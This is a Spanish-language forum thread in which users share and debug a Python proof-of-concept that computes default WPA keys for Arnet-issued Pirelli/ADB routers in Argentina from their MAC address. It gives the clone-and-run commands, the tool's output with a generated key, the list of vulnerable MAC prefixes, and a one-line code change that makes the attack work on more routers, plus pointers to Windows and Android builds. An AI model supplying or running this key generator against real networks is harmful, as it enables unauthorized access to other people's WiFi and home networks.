Crear Diccionario WPA para ARNET WPA

Publicado por infolinuxar, 03 de Septiembre de 2012, 10:35:50 AM

Tema anterior - Siguiente tema

0 Miembros y 3 Visitantes están viendo este tema.

matt_1210

disculpa mi ignorancia,se puede hace un ejecutable del algoritmo?

D3M0N

#136
You are not allowed to view links. Register or Login
disculpa mi ignorancia,se puede hace un ejecutable del algoritmo?

En un terminal:

$ git clone https://dudux@bitbucket.org/dudux/adbpirelli.git
$ cd adbpirelli
$ python wifiarnet.py


Desde wifislax podes lanzarlo perfectamente, en windows creo que si tenes instalado python tendría que andar también.

Uso:

$ python wifiarnet.py -v
wifiarnet.py 1.0 [2014-09-11] ----> http://www.ednolo.alumnos.upv.es


$ python wifiarnet.py 
usage: wifiarnet.py [-h] [-b [BSSID]] [-v] [-l]

>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina. So far
only WiFi networks with essid like Wifi-Arnet-XXXX and manufactured by Pirelli
are likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list            List all vulnerable targets (essid Wifi-Arnet-XXXX)

required:
  -b [BSSID], --bssid [BSSID]
                    Target mac address

(+) Help: python wifiarnet.py -b 74:88:8B:AD:C0:DE


$ python wifiarnet.py -l
[+] Possible vulnerable targets so far:
     bssid: 00:08:27:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:13:C8:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:17:C2:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:19:3E:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:1C:A2:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:1D:8B:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:22:33:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:8C:54:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 30:39:F2:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 74:88:8B:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 84:26:15:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: A4:52:6F:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: A4:5D:A1:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: D0:D4:12:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: D4:D1:84:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: DC:0B:1A:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: F0:84:2F:XX:XX:XX    essid: Wifi-Arnet-XXXX


$ python wifiarnet.py -b 74:88:8B:AD:C0:DE
[+] SSID    : Wifi-Arnet-XXXX
[+] MAC     : 74:88:8B:AD:C0:DE
[+] WPA key : hj0wl2c2r7


y ya hay aplicación para Android:



You are not allowed to view links. Register or Login

matt_1210

#137

gracias por la ayuda lo acabo de probar y lamentablemente la clave que me tiro es incorrecta le probe en un modem pirelli modelo pdg a4001n software pdg_tar_4.06L.02.2813  y la clave es P9VRfW3EYVYFh estuve mirando y estan viniendo con claves de 13 caracteres

D3M0N

Fijaste que si pones -l te da las MAC Address compatibles, por ejemplo las que logro ver:

9C:D2:4B ZTE CORPORATION
08:7A:4C Huawei Technologies Co., Ltd
28:28:5D ZyXEL Communications Corporation
F0:84:2F ADB Broadband Italia
64:2D:AB -no se sabe-
A4:52:6F ADB Broadband Italia
FC:F5:28 ZyXEL Communications Corporation
4C:AC:25 -no se sabe-
B4:82:FE Askey Computer Corp

Las Compatibles:

00:08:27
00:13:C8
00:17:C2
00:19:3E
00:1C:A2
00:1D:8B
00:22:33
00:8C:54
30:39:F2
74:88:8B
84:26:15
A4:52:6F
A4:5D:A1
D0:D4:12
D4:D1:84
DC:0B:1A
F0:84:2F

matt_1210

hola probe con un router que trae por la mac F0:84:2F aparece ultima en la lista esa lista y me dice que la contraseña es incorrecta  :( vos verificaste alguna? @D3M0N

D3M0N

Lamentablemente las tengo bastante lejos las redes como para lograr una conexion, pero segun las imágenes que tenemos en el hilo pude verificar las siguientes MAC Address:

00:8C:54:XX:XX:XX
74:88:8B:XX:XX:XX
D4:D1:84:XX:XX:XX


En si la lista es a base del fabricante:

00-08-27
00-13-C8
00-17-C2
00-19-3E
00-1C-A2
00-1D-8B
00-22-33
00-8C-54
30-39-F2
74-88-8B
84-26-15
A4-52-6F
A4-5D-A1
D0-D4-12
D4-D1-84
DC-0B-1A
F0-84-2F


Puedes verla en: You are not allowed to view links. Register or Login

Nicash

You are not allowed to view links. Register or Login
hola probe con un router que trae por la mac F0:84:2F aparece ultima en la lista esa lista y me dice que la contraseña es incorrecta  :( vos verificaste alguna? @D3M0N

¡Hola, amigos! Si la clave que les da es incorrecta prueben a editar esta parte del código:

mac = bytearray.fromhex('%012x' %(int(mac_str,16) +1))


Y déjenla así:

mac = bytearray.fromhex('%012x' %(int(mac_str,16)))


Lo comprobé con dos router y funciona perfecto...
Pruebenlo, obviamente si la MAC es compatible.
Hice correr el script en Windows instalando Python, aunque fue un poquito más complejo que solo instalarlo. Corranlo desde Wifislax, anda genial y no tienen que instalar nada.

Saludos y espero les sirva!! :D

Si no saben como editarlo o no se dan cuenta, acá lo tienen ya editado:
You are not allowed to view links. Register or Login

D3M0N

#142
@Nicash: Perfecto! a probar se ha dicho! igual modifique el Script para que de los dos posibles keys directamente:

WPAARNET

Script: You are not allowed to view links. Register or Login

2kW79@32WEYS

¿Solo pasa con esa MAC? Yo probe la lista de la pagina 8 y funcionaba en todos los casos.
Porfavor mandarme un mail con los detalles y cuando pueda lo modificare y asi estara actualizado
en Wifislax tambien. Si quereis commitear un pull-request y mirare el codigo.

Saludos

Nicash

You are not allowed to view links. Register or Login
¿Solo pasa con esa MAC? Yo probe la lista de la pagina 8 y funcionaba en todos los casos.
Porfavor mandarme un mail con los detalles y cuando pueda lo modificare y asi estara actualizado
en Wifislax tambien. Si quereis commitear un pull-request y mirare el codigo.

Saludos

Para mi el problema está en que las etiquetas no muestran la MAC real del router. Por lo que si usamos un scanner de redes y usamos esa MAC con el script original no nos va a funcionar, porque la MAC real es +1 de lo que figura en la etiqueta.
El algoritmo calcula correctamente el password para la MAC de la etiqueta, pero si no tenemos acceso físico al router tendremos que modificarle esa linea de código que dije para obtener el password.

Aquí dejo de ejemplo el router al que tengo acceso físico:





¡Saludos!

matt_1210

@2kW79@32WEYS,@Nicash,@D3M0N  son unos grosos funciona probe con una y funka de maravilla, una consulta me tope con un modem de arnet estos dias de la marca zyxel modelo p-600hnu tlv2 lo raro es que trae una clave predeterminada de 13 caracteres alfanumericos mayusculas y minusculas un ejemplo de estea es: P9VRfW3EYVYFh se podria usar este algoritmo para que tratar de desencriptar estas claves?



2kW79@32WEYS

@ matt_1210: Me puedes pasar o un firmware de ese Zyxel o un router fisico?

D3M0N

#147
Compilado para windows: You are not allowed to view links. Register or Login

uso:

arnetwpa.exe -b MAC


desde una consola.

2kW79@32WEYS

D3m0n hay una nueva version en el repositorio. Podiais probar esa?
Si haces un binario con py2exe estaria genial. Gracias

matt_1210

@2kW79@32WEYS: che no tengo ni  idea como te puedo pasar el firmware,alguien que me pueda guiar